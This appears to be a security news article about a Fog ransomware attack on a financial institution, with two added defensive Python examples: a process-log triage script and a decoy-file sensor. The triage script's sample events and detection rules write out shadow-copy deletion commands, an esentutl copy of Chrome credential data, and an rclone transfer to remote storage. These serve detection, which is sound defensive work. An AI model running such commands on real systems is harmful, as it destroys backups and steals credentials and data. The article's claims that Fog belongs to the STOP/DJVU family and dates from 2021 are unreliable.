Fog, a ransomware variant belonging to the STOP/DJVU family that formerly targeted the education and recreation sectors, has turned its attention to profitable targets in the finance industry.
In early August 2024, threat actors used compromised VPN credentials to launch a ransomware attack against a mid-sized financial institution.
Criminals used Fog ransomware (also known as “Lost in the Fog”) to target sensitive data on endpoints running Windows and Linux operating systems.
The attack was nevertheless stopped by Adlumin's technology, which plants decoy files as sensors to identify ransomware activity within the network.
Overview of Fog Ransomware
Fog ransomware was first detected in 2021. It mostly targets industries such as education and recreation, and it breaches network defenses by logging in with compromised VPN credentials.
Once inside a network, Fog operators expand their foothold by using techniques such as pass-the-hash to escalate privileges to the administrative level.
Fog then takes several steps to undermine the victim's defenses: disabling security features, encrypting important files (particularly virtual machine disks, VMDKs), and deleting backup data, leaving victims with little option except to consider paying the ransom.
Encrypted files typically carry the extension “.FOG” or “.FLOCKED” and are accompanied by a ransom note that points victims to a negotiation platform on the Tor network.
The attackers began network discovery with a series of pings to different destinations. They then used the tool ‘Advanced_Port_Scanner_2.5.3869(1).exe’ for network reconnaissance, scanning hosts on the network with the elevated privileges of the compromised service accounts.
The Adlumin team determined that the attack came from a Russian IP address and traced the hack to an unprotected device.
Using domain trust relationship information and two compromised service accounts, the attackers moved laterally within the network.
The next stage involved making copies of login information saved on endpoints for numerous users, including encrypted Google Chrome credentials, with the Microsoft command-line utility “esentutl.exe.”
The threat actor then synced and transferred data from infected endpoints using ‘Rclone,’ an open-source command-line tool for copying data to remote storage.
The executable used to deploy the ransomware was identified as “locker.exe,” a name that points to its role in “locking,” that is encrypting, the data.
The ransom note was then dropped in a file called “readme.txt” on every compromised endpoint. To prevent victims from restoring their files from backups, the attackers also deleted system shadow copies using PowerShell and WMIC commands.
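The behaviours listed above (port scanning from a service account, esentutl copying Chrome credential data, Rclone transfers, shadow copy deletion via WMIC or PowerShell, and the locker.exe payload) are all visible in process-creation telemetry. The following is an added detection example written for this article, not code from Adlumin, Arctic Wolf or the article itself. The log layout, host and user names, file paths and every sample event are constructed for the demo; only the tool names and commands come from the article. It classifies each event into a stage and flags a host on which several distinct stages appear.

```python
"""
Added example (not from the article, Adlumin or Arctic Wolf): triage
Sysmon-style process-creation records for the tradecraft the article
attributes to the Fog intrusion. The log format and every sample event
below are constructed for this demo.
"""
import re

# Constructed events in a simple "key=value" layout: time host user image cmd.
SAMPLE_EVENTS = [
    "2024-08-02T01:12:03Z host=WS01 user=svc_backup image=C:\\temp\\Advanced_Port_Scanner_2.5.3869(1).exe cmd=Advanced_Port_Scanner_2.5.3869(1).exe",
    "2024-08-02T01:20:44Z host=WS01 user=svc_backup image=C:\\Windows\\System32\\esentutl.exe cmd=esentutl.exe /y \"C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\" /d C:\\temp\\ld.db",
    "2024-08-02T01:33:10Z host=WS01 user=svc_backup image=C:\\temp\\rclone.exe cmd=rclone.exe copy C:\\Shares\\Finance remote:bucket",
    "2024-08-02T02:01:55Z host=WS01 user=svc_backup image=C:\\Windows\\System32\\wbem\\WMIC.exe cmd=wmic shadowcopy delete",
    "2024-08-02T02:02:07Z host=WS01 user=svc_backup image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmd=powershell.exe Get-WmiObject Win32_ShadowCopy | Remove-WmiObject",
    "2024-08-02T02:05:00Z host=WS01 user=svc_backup image=C:\\temp\\locker.exe cmd=locker.exe",
    "2024-08-02T09:00:00Z host=WS01 user=alice image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe cmd=chrome.exe",
]

EVENT_RE = re.compile(
    r"^(?P<time>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+"
    r"image=(?P<image>.*?)\s+cmd=(?P<cmd>.*)$"
)

# One rule per behaviour named in the article; patterns run against the command line.
STAGE_RULES = [
    ("network_discovery", re.compile(r"advanced_port_scanner", re.I)),
    # esentutl /y copies a locked ESE database such as Chrome's "Login Data".
    ("credential_copy", re.compile(r"esentutl.*\s/y\s.*login data", re.I)),
    ("exfil_tool", re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
    ("shadow_copy_deletion", re.compile(
        r"(wmic.*shadowcopy\s+delete|vssadmin.*delete\s+shadows|win32_shadowcopy.*remove-wmiobject)",
        re.I)),
    ("encryptor", re.compile(r"\blocker\.exe\b", re.I)),
]


def parse_event(line):
    """Return the event fields as a dict, or None if the line is not in the expected layout."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def triage(lines):
    """Label each event with the first matching stage; unmatched events are dropped."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for stage, pattern in STAGE_RULES:
            if pattern.search(ev["cmd"]):
                findings.append({"time": ev["time"], "host": ev["host"],
                                 "user": ev["user"], "stage": stage})
                break  # one stage per event is enough for triage
    return findings


def stages_by_host(findings):
    """Group the distinct stages seen on each host (sorted for stable output)."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["host"], set()).add(f["stage"])
    return {host: sorted(stages) for host, stages in grouped.items()}


def likely_intrusion_chain(findings, minimum_stages=3):
    """A host showing several distinct stages is far more suspicious than any single hit."""
    return {host: len(stages) >= minimum_stages
            for host, stages in stages_by_host(findings).items()}


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['time']} {f['host']} {f['user']:<12} {f['stage']}")
    print(likely_intrusion_chain(triage(SAMPLE_EVENTS)))
```

The chain score is the point: a single esentutl or Rclone execution has benign uses, but discovery, credential copying, exfiltration tooling and shadow copy deletion from the same service account on one host within an hour is the sequence the article describes, and that combination is what should page an analyst.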
The Arctic Wolf team stated in an analysis released in early June that the threat actors seem more focused on making a quick payout than carrying out a more intricate attack that involves data exfiltration and a well-known leak site.
The Ransomware Prevention feature of Adlumin automatically shuts out the attackers, isolates the compromised devices, and stops data theft.
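The article credits decoy files acting as sensors with catching the encryptor. The following is an added illustration of how such a canary sensor works in its simplest form; it is not Adlumin's product code and makes no claim about how their feature is built. The decoy file names, the temporary directory and the tampering helper are constructed for the demo; the “.FOG” and “.FLOCKED” extensions and the “readme.txt” note name are taken from the article.

```python
"""
Added example (not Adlumin's code): a minimal decoy-file sensor. Decoys are
files no legitimate process should touch, so any change to them, a file
gaining a ransomware extension, or a ransom note appearing beside them is
a high-confidence signal. Decoy names and the test helper are constructed.
"""
import hashlib
import os
import tempfile

DECOY_NAMES = ["Q3_budget_draft.xlsx", "board_minutes.docx"]  # assumed decoy names
RANSOM_EXTENSIONS = (".fog", ".flocked")                      # extensions named in the article
RANSOM_NOTE = "readme.txt"                                    # note file named in the article


def _sha256(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def plant_decoys(directory, names=DECOY_NAMES):
    """Write the decoys and return a baseline of path -> content hash."""
    baseline = {}
    for name in names:
        path = os.path.join(directory, name)
        with open(path, "wb") as fh:
            fh.write(b"DECOY - do not edit: " + name.encode())
        baseline[path] = _sha256(path)
    return baseline


def scan_decoys(directory, baseline):
    """Compare the directory against the baseline; return a list of (kind, path) alerts."""
    alerts = []
    present = {os.path.join(directory, n) for n in os.listdir(directory)}
    for path, digest in baseline.items():
        if path not in present:
            alerts.append(("decoy_missing", path))       # renamed or deleted
        elif _sha256(path) != digest:
            alerts.append(("decoy_modified", path))      # overwritten in place
    for path in sorted(present):
        lower = path.lower()
        if lower.endswith(RANSOM_EXTENSIONS):
            alerts.append(("ransomware_extension", path))
        if os.path.basename(lower) == RANSOM_NOTE:
            alerts.append(("ransom_note", path))
    return alerts


def simulate_tampering(directory, name=DECOY_NAMES[0]):
    """Test helper only: reproduce what the sensor sees after an encryptor has run
    (decoy overwritten, renamed with the .FOG extension, note dropped)."""
    src = os.path.join(directory, name)
    with open(src, "wb") as fh:
        fh.write(os.urandom(32))
    os.rename(src, src + ".FOG")
    with open(os.path.join(directory, RANSOM_NOTE), "w") as fh:
        fh.write("constructed placeholder note\n")


def demo():
    """Plant decoys in a temp dir, confirm a clean scan, tamper, rescan; return alert kinds."""
    with tempfile.TemporaryDirectory() as tmp:
        baseline = plant_decoys(tmp)
        if scan_decoys(tmp, baseline):
            raise RuntimeError("clean baseline should produce no alerts")
        simulate_tampering(tmp)
        return sorted(kind for kind, _ in scan_decoys(tmp, baseline))


if __name__ == "__main__":
    print(demo())
```

In a real deployment the scan would be driven by file-system change notifications rather than polling, and the alert would trigger the isolation step the article describes; the hashing and extension checks above are the decision logic either way.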
Recommended defenses include multi-factor authentication (MFA), keeping VPN software patched, monitoring VPN access, isolating affected endpoints, using a comprehensive security platform, backing up crucial data, applying the principle of least privilege, and maintaining incident response plans.